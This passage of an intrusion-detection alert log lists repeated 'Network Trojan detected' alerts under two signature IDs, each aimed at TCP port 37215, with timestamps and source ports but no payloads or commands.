          Timestamp:06/09/24-16:33:15.224794
          SID:2835222
          Source Port:49596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909177
          SID:2829579
          Source Port:53244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247165
          SID:2835222
          Source Port:34626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942074
          SID:2835222
          Source Port:41832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415437
          SID:2829579
          Source Port:53378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415341
          SID:2829579
          Source Port:49914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288524
          SID:2829579
          Source Port:33454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418678
          SID:2835222
          Source Port:36318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205194
          SID:2829579
          Source Port:36064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.639952
          SID:2829579
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004628
          SID:2829579
          Source Port:56018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312909
          SID:2829579
          Source Port:34798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603415
          SID:2829579
          Source Port:49042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987509
          SID:2829579
          Source Port:34676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158163
          SID:2835222
          Source Port:33420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905891
          SID:2835222
          Source Port:59344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076191
          SID:2829579
          Source Port:53552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286812
          SID:2835222
          Source Port:57218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162666
          SID:2829579
          Source Port:52838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944969
          SID:2829579
          Source Port:33862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.952075
          SID:2835222
          Source Port:43610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861324
          SID:2835222
          Source Port:43586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029477
          SID:2829579
          Source Port:55660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039177
          SID:2829579
          Source Port:55728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418728
          SID:2829579
          Source Port:40498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559117
          SID:2835222
          Source Port:49852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286416
          SID:2835222
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895923
          SID:2835222
          Source Port:49464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246047
          SID:2829579
          Source Port:47550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004037
          SID:2835222
          Source Port:44910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865861
          SID:2835222
          Source Port:40388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243707
          SID:2829579
          Source Port:51742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080213
          SID:2829579
          Source Port:45264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600476
          SID:2829579
          Source Port:41674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905293
          SID:2829579
          Source Port:43606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721122
          SID:2829579
          Source Port:53900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593954
          SID:2835222
          Source Port:41028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719876
          SID:2829579
          Source Port:39974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567616
          SID:2835222
          Source Port:39010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920186
          SID:2829579
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288995
          SID:2829579
          Source Port:34488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038160
          SID:2835222
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130218
          SID:2835222
          Source Port:50294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867056
          SID:2829579
          Source Port:60896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715087
          SID:2835222
          Source Port:57622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904447
          SID:2829579
          Source Port:59454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415357
          SID:2829579
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538452
          SID:2829579
          Source Port:45828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821536
          SID:2835222
          Source Port:46240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719382
          SID:2835222
          Source Port:47162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103697
          SID:2829579
          Source Port:43026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419040
          SID:2829579
          Source Port:50728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645448
          SID:2835222
          Source Port:53408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605959
          SID:2835222
          Source Port:38226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034255
          SID:2835222
          Source Port:60952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718235
          SID:2829579
          Source Port:33578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724050
          SID:2835222
          Source Port:41198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720107
          SID:2829579
          Source Port:54536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929562
          SID:2835222
          Source Port:47568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165467
          SID:2835222
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558239
          SID:2829579
          Source Port:33890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274800
          SID:2829579
          Source Port:42062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035126
          SID:2829579
          Source Port:56038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465167
          SID:2829579
          Source Port:45446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415577
          SID:2829579
          Source Port:49086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557408
          SID:2829579
          Source Port:59774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823042
          SID:2835222
          Source Port:41604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288356
          SID:2835222
          Source Port:54774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205835
          SID:2835222
          Source Port:48480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251305
          SID:2829579
          Source Port:48874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288930
          SID:2829579
          Source Port:39532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538669
          SID:2829579
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599356
          SID:2829579
          Source Port:57756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230896
          SID:2829579
          Source Port:34162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209794
          SID:2835222
          Source Port:36098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928507
          SID:2829579
          Source Port:47202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207506
          SID:2835222
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714243
          SID:2835222
          Source Port:60794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646375
          SID:2835222
          Source Port:57998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863205
          SID:2829579
          Source Port:38988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637923
          SID:2835222
          Source Port:34574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004319
          SID:2829579
          Source Port:35026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164688
          SID:2835222
          Source Port:48474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396831
          SID:2829579
          Source Port:45960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468893
          SID:2835222
          Source Port:50858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719207
          SID:2829579
          Source Port:60702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225466
          SID:2835222
          Source Port:58052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400005
          SID:2835222
          Source Port:33038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645237
          SID:2829579
          Source Port:32986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924433
          SID:2829579
          Source Port:44592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915016
          SID:2835222
          Source Port:45210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559601
          SID:2829579
          Source Port:51852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820424
          SID:2835222
          Source Port:51214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869826
          SID:2835222
          Source Port:36244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471261
          SID:2829579
          Source Port:41970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923044
          SID:2835222
          Source Port:54858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908748
          SID:2835222
          Source Port:51444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298304
          SID:2835222
          Source Port:44454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035701
          SID:2829579
          Source Port:48168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926880
          SID:2829579
          Source Port:40114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946157
          SID:2829579
          Source Port:37350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161951
          SID:2835222
          Source Port:43834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895741
          SID:2829579
          Source Port:46742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285612
          SID:2829579
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.639882
          SID:2835222
          Source Port:52106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033224
          SID:2829579
          Source Port:36006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284281
          SID:2835222
          Source Port:36042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080198
          SID:2835222
          Source Port:35120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248106
          SID:2835222
          Source Port:53438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416303
          SID:2829579
          Source Port:49816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567715
          SID:2835222
          Source Port:33482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226460
          SID:2829579
          Source Port:57404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296976
          SID:2829579
          Source Port:37192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417480
          SID:2835222
          Source Port:42364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296932
          SID:2835222
          Source Port:51836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716553
          SID:2829579
          Source Port:42894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476523
          SID:2835222
          Source Port:41672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033674
          SID:2835222
          Source Port:56438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166766
          SID:2829579
          Source Port:50416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038929
          SID:2835222
          Source Port:32904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931611
          SID:2829579
          Source Port:53956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246024
          SID:2835222
          Source Port:46872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035780
          SID:2829579
          Source Port:37960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915031
          SID:2835222
          Source Port:54250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539669
          SID:2835222
          Source Port:35162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289053
          SID:2829579
          Source Port:55678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160488
          SID:2835222
          Source Port:34054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571561
          SID:2835222
          Source Port:40120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990916
          SID:2829579
          Source Port:46954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864443
          SID:2829579
          Source Port:60632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248289
          SID:2835222
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716861
          SID:2835222
          Source Port:38116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928391
          SID:2835222
          Source Port:35148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244174
          SID:2829579
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267394
          SID:2829579
          Source Port:57586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563654
          SID:2835222
          Source Port:60778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168780
          SID:2835222
          Source Port:36836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905936
          SID:2829579
          Source Port:47734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928131
          SID:2835222
          Source Port:36676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.887805
          SID:2829579
          Source Port:39604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920133
          SID:2835222
          Source Port:59344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036101
          SID:2829579
          Source Port:35148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289553
          SID:2835222
          Source Port:42392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275842
          SID:2829579
          Source Port:45094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418768
          SID:2829579
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645481
          SID:2835222
          Source Port:42986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468690
          SID:2829579
          Source Port:39118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035687
          SID:2835222
          Source Port:40226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645828
          SID:2835222
          Source Port:45620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947803
          SID:2835222
          Source Port:37754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036899
          SID:2829579
          Source Port:42516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596398
          SID:2835222
          Source Port:57496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082835
          SID:2829579
          Source Port:39810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646013
          SID:2829579
          Source Port:58736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987363
          SID:2835222
          Source Port:43648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164136
          SID:2829579
          Source Port:40418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865070
          SID:2829579
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227262
          SID:2835222
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916509
          SID:2835222
          Source Port:39020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946617
          SID:2835222
          Source Port:57558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226021
          SID:2829579
          Source Port:50778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158368
          SID:2835222
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008446
          SID:2835222
          Source Port:39546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539490
          SID:2835222
          Source Port:57768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291289
          SID:2835222
          Source Port:36988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822512
          SID:2829579
          Source Port:40060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915716
          SID:2829579
          Source Port:60936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944201
          SID:2835222
          Source Port:39448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571597
          SID:2835222
          Source Port:45866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989944
          SID:2835222
          Source Port:38490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078708
          SID:2835222
          Source Port:42916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720752
          SID:2829579
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718171
          SID:2829579
          Source Port:41556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248904
          SID:2829579
          Source Port:45024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916627
          SID:2829579
          Source Port:35024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302272
          SID:2829579
          Source Port:52940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594241
          SID:2835222
          Source Port:48754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417608
          SID:2829579
          Source Port:46648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222900
          SID:2835222
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161055
          SID:2835222
          Source Port:36682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035082
          SID:2835222
          Source Port:43020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296831
          SID:2835222
          Source Port:43608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740697
          SID:2829579
          Source Port:43346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274236
          SID:2835222
          Source Port:49948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998437
          SID:2829579
          Source Port:41936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.542770
          SID:2835222
          Source Port:41310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677295
          SID:2835222
          Source Port:51038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169412
          SID:2829579
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017822
          SID:2829579
          Source Port:48098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306641
          SID:2829579
          Source Port:46656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275937
          SID:2829579
          Source Port:53780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944681
          SID:2835222
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034877
          SID:2829579
          Source Port:33962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294381
          SID:2829579
          Source Port:57628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718952
          SID:2835222
          Source Port:40740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080959
          SID:2835222
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396859
          SID:2829579
          Source Port:36154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008634
